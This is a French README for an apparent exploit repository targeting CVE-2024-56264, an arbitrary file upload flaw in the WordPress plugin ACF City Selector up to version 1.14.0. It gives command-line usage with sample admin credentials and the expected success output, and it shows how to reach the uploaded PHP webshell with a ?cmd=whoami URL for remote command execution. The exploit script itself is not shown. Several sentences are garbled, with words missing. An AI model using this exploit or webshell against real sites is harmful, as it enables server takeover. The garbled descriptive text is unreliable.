
Exploit Python pour CVE-2024-56264, une vulnérabilité de téléchargement arbitraire de fichiers dans le plugin WordPress ACF City Selector <=1.14.0, permettant l'exécution de code à distance via le téléchargement d'un webshell.
Ce dépôt contient un exploit pour CVE-2024-56264, qui est une vulnérabilité de téléchargement arbitraire de fichier trouvée dans le plugin WordPress ACF City Selector (versions <= 1.14.0). Cette vulnérabilité permet à un attaquant de télécharger un fichier PHP malveillant (web shell) sur une instance WordPress vulnérable et d'exécuter des commandes arbitraires sur le serveur.
<= 1.14.0Le plugin ACF City Selector ne parvient pas à valider correctement les fichiers téléchargés, permettant aux attaquants de et de télécharger . Une fois qu'un fichier PHP malveillant est téléchargé, un attaquant peut exécuter des commandes système à distance, entraînant une .
Assurez-vous que les éléments suivants sont installés avant d'exécuter le script :
requests (Installer en utilisant : pip install requests)Vous pouvez installer toutes les dépendances requises en utilisant :
pip install -r requirements.txt
Exécution de l'exploit :
usage: CVE-2024-56264.py [-h] --url URL --username USERNAME --password PASSWORD
WordPress ACF City Selector plugin <= 1.14.0 - Arbitrary File Upload vulnerability
options:
-h, --help show this help message and exit
--url URL Website base URL (e.g., http://192.168.100.74/wordpress)
--username USERNAME WordPress username
--password PASSWORD WordPress password
python CVE-2024-56264.py --url http://192.168.100.74:888/wordpress --username admin --password admin
En cas d'exploitation réussie, vous devriez voir :
[+] Detected plugin version: 1.14.0
[+] Vulnerable version detected! Proceeding with exploitation.
[+] Logged in successfully.
[+] Extracted nonce: abc1234
[+] Shell uploaded successfully: http://wordpress/wp-content/uploads/acfcs/q.php
En cas de succès, accédez au shell téléchargé via :
http://wordpress/wp-content/uploads/acfcs/q.php?cmd=whoami
Cela permet l'exécution de commandes à distance sur le serveur.
Ce script est destiné uniquement à des fins éducatives et de tests de sécurité autorisés. Toute utilisation non autorisée est illégale et peut entraîner de graves conséquences. L'auteur n'est pas responsable de toute mauvaise utilisation de cet exploit.